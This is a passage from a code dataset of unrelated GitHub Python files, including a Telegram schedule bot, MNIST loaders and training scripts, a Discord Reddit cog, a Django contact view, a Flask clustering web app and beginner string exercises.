callback_data=callback_dir))\n\n keyboard.add(\n InlineKeyboardButton(MarkupText.STFROM, callback_data=callback_ignore),\n InlineKeyboardButton(MarkupText.STTO, callback_data=callback_ignore),\n InlineKeyboardButton(station_from, callback_data=callback_from),\n InlineKeyboardButton(station_to, callback_data=callback_to),\n )\n if sfrom_field_is_completed and sto_field_is_completed:\n keyboard.add(\n InlineKeyboardButton(\n 'Показать расписание', callback_data=callback_schedule\n )\n )\n keyboard.add(InlineKeyboardButton('Отмена', callback_data=callback_cancel))\n return keyboard\n\n\nasync def mcd_direction_kboard(root: typing.Dict[str, str]) -> InlineKeyboardMarkup:\n \"\"\"\n Builds direction keyboard with directions column\n \"\"\"\n keyboard = InlineKeyboardMarkup(row_width=2)\n id_list = [\n item['id']\n for item in conn.execute('SELECT id FROM direction WHERE id > 10').fetchall()\n ]\n name_list = [\n item['name']\n for item in conn.execute('SELECT name FROM direction WHERE id > 10').fetchall()\n ]\n callback_list = [\n await callback_builder(root, Call.TABLE, dir=id, sfrom='', sto='', page=0)\n for id in id_list\n ]\n buttons = [\n InlineKeyboardButton(name, callback_data=callback)\n for name, callback in zip(name_list, callback_list)\n ]\n keyboard.add(*buttons)\n keyboard.add(InlineKeyboardButton('Отмена', callback_data=callback_cancel))\n return keyboard\n\n\nasync def mcd_station_kboard(root: typing.Dict[str, str],\n lines: int = 14) -> InlineKeyboardMarkup:\n \"\"\"\n Builds station keyboard with stations column and pages selection bar\n \"\"\"\n keyboard = InlineKeyboardMarkup(row_width=2)\n id_list = [\n item['id']\n for item in conn.execute(\n 'SELECT id FROM station WHERE mcdid = ?', (root['dir'],)\n ).fetchall()\n ]\n name_list = [\n item['name']\n for item in conn.execute(\n 'SELECT name FROM station WHERE mcdid = ?', (root['dir'],)\n ).fetchall()\n ]\n if root['call'] == Call.MSTFROM:\n callback_list = [\n await callback_builder(root, Call.TABLE, sfrom=id)\n for id in id_list\n ]\n elif root['call'] == Call.MSTTO:\n callback_list = [\n await callback_builder(root, Call.TABLE, sto=id)\n for id in id_list\n ]\n buttons = [\n InlineKeyboardButton(name, callback_data=callback)\n for name, callback in zip(name_list, callback_list)\n ]\n\n pages = ceil(id_list.__len__() / lines)\n if root.get('page') in (None, ''):\n page = 0\n else:\n page = int(root['page'])\n selection_bar = await get_selection_bar(root, page, pages)\n\n keyboard.add(*buttons[page * lines : page * lines + lines])\n keyboard.row(*selection_bar)\n keyboard.add(InlineKeyboardButton('Отмена', callback_data=callback_cancel))\n return keyboard\n\n\nasync def mcd_worker(call: CallbackQuery) -> None:\n \"\"\"\n Check for callback for this script\n \"\"\"\n procedure = await util.loads(call.data)\n\n if procedure['call'] == Call.DIR:\n message_text = text.MCD\n markup = await mcd_direction_kboard(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return None\n \n elif procedure['call'] == Call.TABLE:\n message_text = text.SEARCH\n markup = await mcd_table(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return None\n\n elif procedure['call'] == Call.MSTFROM:\n message_text = MarkupText.MSTFROM\n markup = await mcd_station_kboard(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return None\n\n elif procedure['call'] == Call.MSTTO:\n message_text = MarkupText.MSTTO\n markup = await mcd_station_kboard(procedure)\n await 
call.message.edit_text(message_text, reply_markup=markup)\n return None\n","repo_name":"tohabyuraev/Elka","sub_path":"scripts/mcd.py","file_name":"mcd.py","file_ext":"py","file_size_in_byte":6331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2924491268","text":"from multiprocessing.connection import answer_challenge\n\nimport string\ndef cap_each_word(string1):\n if len(string1)<1:\n return string1\n result = \"\"\n word_array = string1.split(\" \",)\n for x in word_array:\n if len(result)>0:\n result = result + \" \" + x.strip().capitalize()\n else:\n result = x.capitalize()\n if not result:\n return string1\n else:\n return result\n \nresult1 = \"how can mirrors be real if our eyes aren't real\"\nresult = cap_each_word(result1)\nprint(result)\n\nnewStr = \"it's going to be sunny\"\ndef capitalize(string):\n answer = \"\"\n string2 = string.split()\n for elems in string2:\n #capitalize each word and add it to a string\n if len(answer)>0:\n answer = answer + \" \" + elems.strip().capitalize()\n else:\n answer = elems.capitalize()\n #if answer is still empty, return the original string\n if not answer:\n return string\n else:\n return answer\n\n print(string2)\ncapitalize(\"It's going to be sunny\")\n\nexample = \"winning is a choice,lets go get it\"\nresult = \" \".join(x.capitalize() for x in example.split())\nresult2 = string.capwords(example)\nprint(result2)","repo_name":"JoshkefGhost6958/strings","sub_path":"newu.py","file_name":"newu.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34426169355","text":"import sys\n\nimport numpy as np\nimport tensorflow as tf\nfrom absl import flags\nfrom keras.utils.data_utils import get_file\n\nfrom deepray.datasets.datapipeline import DataPipeLine\nfrom deepray.utils.horovod_utils import get_rank, get_world_size\n\nFLAGS = flags.FLAGS\nFLAGS([\n sys.argv[0],\n \"--num_train_examples=60000\",\n])\n\n\nclass Mnist(DataPipeLine):\n\n def __init__(self, path=\"mnist.npz\"):\n \"\"\"Loads the MNIST dataset.\n\n This is a dataset of 60,000 28x28 grayscale images of the 10 digits,\n along with a test set of 10,000 images.\n More info can be found at the\n [MNIST homepage](http://yann.lecun.com/exdb/mnist/).\n\n Args:\n path: path where to cache the dataset locally\n (relative to `~/.keras/datasets`).\n\n Returns:\n Tuple of NumPy arrays: `(x_train, y_train), (x_test, y_test)`.\n\n **x_train**: uint8 NumPy array of grayscale image data with shapes\n `(60000, 28, 28)`, containing the training data. Pixel values range\n from 0 to 255.\n\n **y_train**: uint8 NumPy array of digit labels (integers in range 0-9)\n with shape `(60000,)` for the training data.\n\n **x_test**: uint8 NumPy array of grayscale image data with shapes\n (10000, 28, 28), containing the test data. 
Pixel values range\n from 0 to 255.\n\n **y_test**: uint8 NumPy array of digit labels (integers in range 0-9)\n with shape `(10000,)` for the test data.\n\n Example:\n\n ```python\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n assert x_train.shape == (60000, 28, 28)\n assert x_test.shape == (10000, 28, 28)\n assert y_train.shape == (60000,)\n assert y_test.shape == (10000,)\n ```\n\n License:\n Yann LeCun and Corinna Cortes hold the copyright of MNIST dataset,\n which is a derivative work from original NIST datasets.\n MNIST dataset is made available under the terms of the\n [Creative Commons Attribution-Share Alike 3.0 license.](\n https://creativecommons.org/licenses/by-sa/3.0/)\n \"\"\"\n super().__init__()\n origin_folder = (\"https://storage.googleapis.com/tensorflow/tf-keras-datasets/\")\n self.path = get_file(\n path,\n origin=origin_folder + \"mnist.npz\",\n file_hash=( # noqa: E501\n \"731c5ac602752760c8e48fbffcf8c3b850d9dc2a2aedcf2cc48468fc17b673d1\"\n ),\n )\n\n def build_dataset(\n self, input_file_pattern, batch_size, is_training=True, prebatch_size=0, epochs=1, shuffle=True, *args, **kwargs\n ):\n with np.load(self.path, allow_pickle=True) as f:\n if is_training:\n x, y = f[\"x_train\"], f[\"y_train\"]\n else:\n x, y = f[\"x_test\"], f[\"y_test\"]\n\n dataset = tf.data.Dataset.from_tensor_slices(\n (tf.cast(x[..., tf.newaxis] / 255.0, tf.float32), tf.cast(y, tf.int64))\n )\n if self.use_horovod:\n # For multi-host training, we want each hosts to always process the same\n # subset of files. Each host only sees a subset of the entire dataset,\n # allowing us to cache larger datasets in memory.\n dataset = dataset.shard(num_shards=get_world_size(), index=get_rank())\n dataset = dataset.repeat(epochs).shuffle(10000).batch(batch_size)\n return dataset\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/datasets/mnist/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"9175222856","text":"\"\"\"\nhttps://www.reddit.com/r/Python/comments/tceagd/better_oop_in_python_no_self_needed_anymore/\n\"\"\"\n\n# pylint:disable = missing-class-docstring,missing-function-docstring,invalid-name\n# pylint:disable = attribute-defined-outside-init,no-method-argument\n# mypy: ignore-errors\n\nimport types\n\nclass ClassNamespace(types.SimpleNamespace):\n def __init__(self,superclass,name):\n for k,v in superclass.__dict__.items():\n self.__dict__.update({k:v})\n self.class_name = name\n def __repr__(self):\n items = (f\"{k}={v!r}\" for k, v in self.__dict__['fields'].items())\n itemstr = \",\".join(items)\n return f\"Instance of {self.class_name} with fields {itemstr}\"\n def my_fields(self):\n return self.__dict__['fields']\n def empty():\n empty_class = ClassNamespace(types.SimpleNamespace(),\"Object\")\n empty_class.__dict__.update({'fields':{}})\n return empty_class\n\ndef Counter(superclass=ClassNamespace.empty()):\n obj = ClassNamespace(superclass,\"Counter\")\n fields = obj.my_fields()\n fields.update({'value':0})\n def incrValue(qt=1):\n nonlocal fields\n fields['value'] += qt\n def decrValue(qt=1):\n nonlocal fields\n fields['value'] -= qt\n def conditionedIncr(qt=1):\n nonlocal fields\n if fields.get('flag',True):\n incrValue(qt)\n else:\n decrValue(qt)\n def getValue():\n nonlocal fields\n return fields['value']\n obj.incrValue = incrValue\n obj.decrValue = decrValue\n obj.getValue = getValue\n obj.conditionedIncr = 
conditionedIncr\n return obj\n\ndef Flagger(superclass=ClassNamespace.empty()):\n obj = ClassNamespace(superclass,\"Flagger\")\n fields = obj.my_fields()\n fields.update({'flag':False})\n def toggle():\n nonlocal fields\n fields['flag'] = not fields['flag']\n def getFlag():\n nonlocal fields\n return fields['flag']\n obj.toggle = toggle\n obj.getFlag = getFlag\n return obj\n\ndef do_twice(func,*args):\n func(*args)\n func(*args)\n\nc = Counter()\nc.incrValue()\nc.incrValue(3)\nc2 = Counter()\ndo_twice(c2.decrValue,2)\nprint(c.getValue(),c2.getValue())\nprint(c)\nprint(c2)\n\nf = Flagger(c)\nprint(f.getFlag(),f.getValue())\nf.toggle()\nprint(f.getFlag(),f.getValue())\nf.incrValue()\nprint(f.getFlag(),f.getValue())\nf.conditionedIncr()\nprint(f.getFlag(),f.getValue())\nprint(f)\nf2 = Flagger(f)\nprint(f2)\n","repo_name":"Cobord/Cursed","sub_path":"cursed_OOP.py","file_name":"cursed_OOP.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71966070888","text":"import config\nimport discord\nfrom discord.ext import commands\nfrom discord.ui import View\nfrom discord import ButtonStyle\nfrom util.reddit_scraper import get_subreddit_drama, get_aita\n\nclass Reddit(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n reddit_group = discord.SlashCommandGroup('reddit', 'Commands which retrieve top posts from subreddits', guild_ids=[config.GUILD_ID])\n\n @reddit_group.command(description='What\\'s trending on r/AmITheAsshole')\n async def aita(self, ctx: discord.ApplicationContext):\n try:\n await ctx.defer()\n post = await get_aita()\n except Exception as e:\n return await ctx.respond('Unable to find an asshole. Try the mirror.', ephemeral=True) \n \n # must truncate embed descriptions to 4096 chars\n if len(post['desc']) > 4096:\n post['desc'] = post['desc'][:4096-3] + '...' \n\n embed = discord.Embed(\n title=post['title'],\n url=f\"https://reddit.com{post['link']}\",\n description=post['desc']\n )\n embed.set_footer(text=f\"{post['upvotes']} upvotes\")\n embed.set_author(name=post['author'])\n\n await ctx.respond(embed=embed, view=AitaView(post))\n\n @reddit_group.command(description='What\\'s trending on r/SubredditDrama')\n async def subreddit_drama(self, ctx: discord.ApplicationContext):\n try:\n await ctx.defer()\n post = await get_subreddit_drama()\n except Exception as e:\n return await ctx.respond('Unable to find a spicy story :/', ephemeral=True) \n \n # must truncate embed descriptions to 4096 chars\n if len(post['desc']) > 4096:\n post['desc'] = post['desc'][:4096-3] + '...' 
\n\n embed = discord.Embed(\n title=post['title'],\n url=f\"https://reddit.com{post['link']}\",\n description=post['desc']\n )\n embed.set_footer(text=f\"{post['upvotes']} upvotes\")\n embed.set_author(name=post['author'])\n\n await ctx.respond(embed=embed)\n\nclass AitaView(View):\n def __init__(self, post):\n super().__init__()\n self.post = post\n\n @discord.ui.button(label='YTA', style=ButtonStyle.red)\n async def yta_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n @discord.ui.button(label='NTA', style=ButtonStyle.green)\n async def nta_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n @discord.ui.button(label='ESH', style=ButtonStyle.blurple)\n async def esh_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n \n @discord.ui.button(label='NAH', style=ButtonStyle.gray)\n async def nah_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n @discord.ui.button(label='INFO', style=ButtonStyle.grey)\n async def info_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n # must truncate it to 2000 characters\n def get_response(self, guess):\n if self.post['sdec'] == \"None\": \n content = f\"Unable to locate a top comment with a valid decision. {self.post['decision']}\"\n elif guess == self.post['sdec']: \n content = f\"{guess} was **correct**! {self.post['decision']}\"\n else: \n content = f\"{guess} was **incorrect**! 
{self.post['decision']}\"\n if len(content) > 2000:\n content = content[:2000-3] + '...'\n return content\n\ndef setup(bot):\n bot.add_cog(Reddit(bot))","repo_name":"ericpretzel/wid-bot","sub_path":"extension/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35964669129","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nlabels = ['centro', 'consolacao', 'interlagos', 'mooca']\nmeans1 = [15, 16, 12, 13]\nmeans2 = [15.5, 16.5, 12, 14]\nmeans3 = [14.5, 15.5, 11, 11]\n\nx = np.arange(len(labels))\nfig, ax = plt.subplots()\n\nrects1 = ax.bar(x - 0.35/3, means1, 0.35, label='Cifra')\nrects2 = ax.bar(x + 0.35/3, means2, 0.35, label='S16')\nrects3 = ax.bar(x + 0.35/12, means3, 0.35, label='Banco Presil')\n\nax.set_ylabel('Tempo (anos)')\nax.set_title('Tempo para adquirir o imóvel nas regiões de SP')\nax.set_xticks(x)\nax.set_xticklabels(labels)\nax.legend()\n\ndef insert(rects):\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\ninsert(rects1)\ninsert(rects2)\ninsert(rects3)\nfig.tight_layout()\nplt.show()","repo_name":"felipe-dias-azevedo/Finoban","sub_path":"crawler/demo/metrica.py","file_name":"metrica.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1367850141","text":"from django.shortcuts import render\nfrom .models import *\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.shortcuts import redirect\n\n# Create your views here.\ndef index(request):\n return render(request=request,\n template_name=\"main/index.html\",\n context={\"profile\":Profile.objects.all()[0],\n \"job_positions\":JobPosition.objects.all})\n\ndef send_email(request):\n if request.method == \"POST\":\n name = request.POST[\"name\"]\n receiver_email = request.POST[\"email\"]\n phone = request.POST[\"phone\"]\n message = request.POST[\"message\"]\n print(name, receiver_email)\n\n sender_email = settings.EMAIL_HOST_USER\n subject = 'Hi, I have an inquiry'\n recipient_list = [receiver_email,]\n \n send_mail( subject, message, sender_email, recipient_list )\n \n return redirect('/')\n else:\n return redirect('/')","repo_name":"roycechua/advanced-python-programming","sub_path":"profile_activity/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5918956273","text":"import torch\nfrom torch import optim, nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\n\n\nclass SimpleNet(nn.Module):\n def __init__(self, in_dim, n_hidden_1, n_hidden_2, out_dim):\n super(SimpleNet, self).__init__()\n self.layer1 = nn.Linear(in_dim, n_hidden_1)\n self.layer2 = nn.Linear(n_hidden_1, n_hidden_2)\n self.layer3 = nn.Linear(n_hidden_2, out_dim)\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n return x\n\n\nclass ActivationNet(nn.Module):\n def __init__(self, in_dim, n_hidden_1, n_hidden_2, out_dim):\n super(ActivationNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Linear(in_dim, n_hidden_1), 
nn.ReLU(True)\n )\n self.layer2 = nn.Sequential(\n nn.Linear(n_hidden_1, n_hidden_2), nn.ReLU(True)\n )\n self.layer3 = nn.Sequential(\n nn.Linear(n_hidden_2, out_dim)\n )\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n return x\n\n\nclass BatchNet(nn.Module):\n def __init__(self, in_dim, n_hidden_1, n_hidden_2, out_dim):\n super(BatchNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Linear(in_dim, n_hidden_1),\n nn.BatchNorm1d(n_hidden_1), nn.ReLU(True)\n )\n self.layer2 = nn.Sequential(\n nn.Linear(n_hidden_1, n_hidden_2),\n nn.BatchNorm1d(n_hidden_2), nn.ReLU(True)\n )\n self.layer3 = nn.Sequential(nn.Linear(n_hidden_2, out_dim))\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n return x\n\n\nbatch_size = 64\nlearning_rate = 1e-2\n\ndata_tf = transforms.Compose([transforms.ToTensor(),transforms.Normalize([0.5], [0.5])])\n\n\n# download data\ntrain_dataset = datasets.MNIST(root='./data', train=True, transform=data_tf, download=True)\ntest_dataset = datasets.MNIST(root='./data', train=False, transform=data_tf)\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\ntest_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)\n\n# model = SimpleNet(28 * 28, 300, 100, 10)\nmodel = BatchNet(28*28, 300, 100, 10)\nif torch.cuda.is_available():\n model = model.cuda()\n print(1)\nelse:\n print(2)\n\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(model.parameters(), lr=learning_rate)\n\n# train\nepoch = 0\nfor data in train_loader:\n # get img and label\n img, label = data\n img = img.view(img.size(0), -1)\n if torch.cuda.is_available():\n img = img.cuda()\n label = label.cuda()\n else:\n # transform data to tensor\n img = Variable(img)\n label = Variable(label)\n\n # forward\n out = model(img)\n loss = criterion(out, label)\n print_loss = loss.data.item()\n\n # backward\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n epoch += 1\n if epoch % 50 == 0:\n print('epoch: {}, loss: {:.4}'.format(epoch, loss.data.item()))\n\nmodel.eval()\n# The sum of loss, the sum of acc\neval_loss = 0\neval_acc = 0\n# use test to test\nfor data in test_loader:\n # get image\n img, label = data\n img = img.view(img.size(0), -1)\n if torch.cuda.is_available():\n img = Variable(img, volatile=True).cuda()\n label = Variable(label, volatile=True).cuda()\n else:\n img = Variable(img, volatile=True)\n label = Variable(label, volatile=True)\n\n # forward\n out = model(img)\n loss = criterion(out, label)\n\n eval_loss += loss.data.item() * label.size(0)\n # get the test result\n _, pred = torch.max(out, 1)\n # check it\n num_correct = (pred == label).sum()\n\n # the sum of true result\n eval_acc += num_correct.item()\n\n# print result\nprint('Test Loss: {:.6f}, Acc: {:.6f}'.format(\n eval_loss / (len(test_dataset)),\n eval_acc / (len(test_dataset))\n))","repo_name":"tangyongchao68/Digit-recognition","sub_path":"Full_mnist.py","file_name":"Full_mnist.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28339401453","text":"#import libraries\nfrom flask import Flask, render_template, request, url_for, session\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport csv\nfrom werkzeug.utils import secure_filename\nfrom sklearn.cluster import KMeans\nimport uuid #Random Short Id\nimport os\nimport scipy.cluster.hierarchy as sch 
\nfrom sklearn.cluster import AgglomerativeClustering\n\nUPLOAD_FOLDER = 'static/uploads/kmeans' #Path to the upload folder\nALLOWED_EXTENSIONS = {'csv'}#allowed file types\n\napp = Flask(__name__)#initialize the Flask app\n\n#file upload \napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/' #Secret key of Session\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n#entry route on startup, renders the main index page\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html')# Home page \n\n#kmeans section, renders the index page for the k-means algorithm\n@app.route('/kmeans', methods=['GET', 'POST'])\ndef kmeans_index():\n return render_template('kmeans/index.html')# Home page \n\n#Check whether the file type is allowed\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n#Display the data for the k-means algorithm after upload\n@app.route('/kmeans/data', methods=['GET', 'POST'])\ndef kmeans_data():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n errors = 'No file part! Please choose 1 file csv !'\n return render_template('kmeans/data.html', errors=errors)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n errors = 'No selected file'\n return render_template('kmeans/data.html', errors=errors)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4())[:8] + '_' + filename)\n file.save(file_path)\n\n session['csvfile'] = file_path #Save path file to session\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5'] \n data = pd.read_csv(file_path, names = columns_name_attribute)\n \n m = data.shape[1]\n return render_template('kmeans/data.html', data=data.to_html(table_id='myTable', classes='table table-striped', header=True, index=False), m=m)\n\n#Display the elbow plot when the user selects columns\n@app.route('/kmeans/elbow', methods=['GET', 'POST'])\ndef kmeans_elbow():\n file_path = session.get('csvfile')\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']\n data = pd.read_csv(file_path, names = columns_name_attribute)\n col = request.form.getlist('cot') #Get values from the checkbox form\n col = np.array(col)\n col1 = col[0]\n col2 = col[1]\n session['col1'] = col1 #Save column to session\n session['col2'] = col2 #Save column to session\n m = data.shape[1]\n bd = 0\n X = data.iloc[int(bd):, [int(col1), int(col2)]]\n n = data.shape[0]\n # Perform the clustering (Elbow)\n # Run the KMeans algorithm with k = (1, 10)\n\n clusters = []\n for i in range(1, 10):\n km = KMeans(n_clusters=i).fit(X)\n clusters.append(km.inertia_)\n\n fig, ax = plt.subplots(figsize=(12, 8))\n sns.lineplot(x=list(range(1, 10)), y=clusters, ax=ax)\n\n ax.set_title(\"Đồ thị Elbow\")\n ax.set_xlabel(\"Số lượng nhóm\")\n ax.set_ylabel(\"Gía trị Inertia\")\n\n image = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_elbow.png'\n plt.savefig(image)\n plt.clf()\n\n return render_template('kmeans/elbow.html', url1='/'+image)\n\n#display the result\n@app.route('/kmeans/ketqua', methods=['GET', 'POST'])\ndef kmeans_clasf():\n file_path = session.get('csvfile')#get the csv file path\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']#column attribute names\n data = pd.read_csv(file_path,names= columns_name_attribute)\n cola = session.get(\"col1\")#get the value of column a\n colb = session.get(\"col2\")#get the value of column b\n bd = 0\n X = data.iloc[int(bd):, [int(cola), int(colb)]].values#data to be clustered\n k = request.form.get('cluster')#get the value of k \n km3 = KMeans(n_clusters= int(k))#run the k-means algorithm\n y_means = km3.fit_predict(X)\n listcolor = ['pink','red','blue','green','yellow']#create a list of colors\n color = []\n for i in range(5):\n color.append(listcolor[i])\n for i in range(int(k)):\n plt.scatter(X[y_means == i, 0], X[y_means == i, 1], s = 100, c = color[i]) \n #centroid of each cluster\n plt.scatter(km3.cluster_centers_[:,0], km3.cluster_centers_[:, 1], s = 100, c = 'orange' , label = 'Centeroid') \n plt.style.use('fivethirtyeight') \n plt.title('K Means Clustering', fontsize = 20) \n plt.xlabel('Annual Income') \n plt.ylabel('Spending Score') \n plt.legend() \n plt.grid() \n img = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_kq.png'\n plt.savefig(img)\n #display the clustering image\n return render_template('kmeans/ketqua.html', url2='/'+img)\n\n###################################################################AGG algorithm\n#serve the index page in the agg section\n@app.route('/agg', methods=['GET', 'POST'])\ndef agg_index():\n return render_template('agg/index.html')# Home page\n\n#display the data when the user uploads it to the site\n@app.route('/agg/data', methods=['GET', 'POST'])\ndef agg_data():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n errors = 'No file part! Please choose 1 file csv !'\n return render_template('agg/data.html', errors=errors)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n errors = 'No selected file'\n return render_template('agg/data.html', errors=errors)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4())[:8] + '_' + filename)\n file.save(file_path)\n\n session['csvfile'] = file_path #Save path file to session\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5'] \n data = pd.read_csv(file_path, names = columns_name_attribute)\n \n m = data.shape[1]\n return render_template('agg/data.html', data=data.to_html(table_id='myTable', classes='table table-striped', header=True, index=False), m=m)\n\n#Display the dendrogram\n@app.route('/agg/dendrogram', methods=['GET', 'POST'])\ndef agg_dendrogram():\n file_path = session.get('csvfile')\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']\n data = pd.read_csv(file_path, names = columns_name_attribute)\n col = request.form.getlist('cot') #Get values from the checkbox form\n col = np.array(col)\n col1 = col[0]\n col2 = col[1]\n session['col1'] = col1 #Save column to session\n session['col2'] = col2 #Save column to session\n m = data.shape[1]\n hihi = 0\n X = data.iloc[int(hihi):, [int(col1), int(col2)]]\n n = data.shape[0]\n\n clusters = []\n dendrogram = sch.dendrogram(sch.linkage(X, method = 'ward')) \n plt.title('Dendrogram') \n plt.xlabel('Khách hàng') \n plt.ylabel('Khoảng cách Euclidean') \n image = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_ded.png'\n plt.savefig(image)\n plt.clf()\n\n return render_template('agg/dendrogram.html', url1='/'+image)\n\n#display the result\n@app.route('/agg/ketqua', methods=['GET', 'POST'])\ndef agg_clasf():\n file_path = session.get('csvfile')\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']\n data = pd.read_csv(file_path,names= 
columns_name_attribute)\n cola = session.get(\"col1\")\n colb = session.get(\"col2\")\n bd = 0\n X = data.iloc[int(bd):, [int(cola), int(colb)]].values\n k = request.form.get('cluster')\n hc = AgglomerativeClustering(n_clusters = int(k), affinity = 'euclidean', linkage = 'ward') \n y_hc = hc.fit_predict(X) \n listcolor = ['pink','red','blue','green','yellow']\n color = []\n for i in range(5):\n color.append(listcolor[i])\n for i in range(int(k)):\n plt.scatter(X[y_hc == i, 0], X[y_hc == i, 1], s = 100, c = color[i])\n plt.title('AGG Clustering', fontsize = 20) \n plt.xlabel('Annual Income') \n plt.ylabel('Spending Score') \n plt.legend() \n plt.grid() \n img = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_kq1.png'\n plt.savefig(img)\n #display the clustered image\n return render_template('agg/ketqua.html', url2='/'+img) \n\n#main function\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n","repo_name":"chaub1609762/doankkdl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9106,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21772538517","text":"from pathlib import Path\r\n\r\np = Path('C:\\Files2020_Dev\\ByProject\\Open15C_Data\\SEC_IndexFiles').glob('*.idx')\r\nxFiles = [e for e in p]\r\nfor y in xFiles:\r\n print(y)\r\nprint('new')\r\n\r\nfor e in p:\r\n print(e)","repo_name":"maxrottersman/Open15C","sub_path":"ztest.py","file_name":"ztest.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42205159776","text":"# Task3 :\n# Question 1\nchairs = '15'\nnails = 4\ntotal_nails = int(chairs) * nails #Convert the chairs into integer\nmessage = 'I need to buy {} nails'.format(total_nails)\nprint(message)\n\n# Question 2\nmy_name = 'Penelope'\nmy_age = 29\nmessage = 'My name is {} and I am {} years old'.format(my_name, my_age)\nprint(message)\n\n# Question 2\n# box_count = int(input(\"Number of boxes:\"))\n# eggs_per_box = int(input(\"Number of eggs per box:\"))\n# eggs_per_omelette = int(input(\"Number of eggs required for one omelette:\"))\n# omelette_count = (box_count * eggs_per_box ) // eggs_per_omelette\n# print(\"You can make {} omelettes with {} boxes of eggs\".format(omelette_count,box_count) )\n\n# Question 4\n# Complete a series of tasks to format strings\n\n# Task 1 - Replace the (.) character with (!) instead. Output should be “I love coding!”\n\nmy_str = \"I love coding.\"\nmy_str = my_str.replace( '.','!' )\nprint(my_str)\n# Task 2\nmy_str_1 = \"EVERY Exercise Brings Me Closer to Completing my GOALS.\"\nmy_str_1 = my_str_1.lower()\nprint(my_str_1)\n# Task 3\nmy_str_2 = \"We enjoy travelling\"\nans_1 = (my_str_2[0] == 'A')\nprint(ans_1)\n# Task 4\nmy_str_3=\"1.458.001\"\n# Type your code here:\nans_2 = len(my_str_3)\nprint(ans_2)\n\n# Question 5\n# Task 1: 